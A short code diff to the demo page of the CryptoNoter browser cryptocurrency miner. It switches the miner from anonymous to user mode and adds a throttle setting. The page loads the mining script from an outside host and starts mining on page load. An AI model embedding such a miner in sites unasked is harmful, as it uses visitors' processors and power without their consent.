--- a/web/demo.html
+++ b/web/demo.html
@@ -20,8 +20,9 @@
 	<script src="https://www.cryptonoter.com/processor.js"></script>
 	<script>
 		var addr = 'CryptoNoter';
-		var miner = new CryptoNoter.Anonymous(addr, {
-			autoThreads: true
+		var miner = new CryptoNoter.User(addr, {
+			autoThreads: true,
+			throttle: 0.5
 		});
 		miner.start();
 
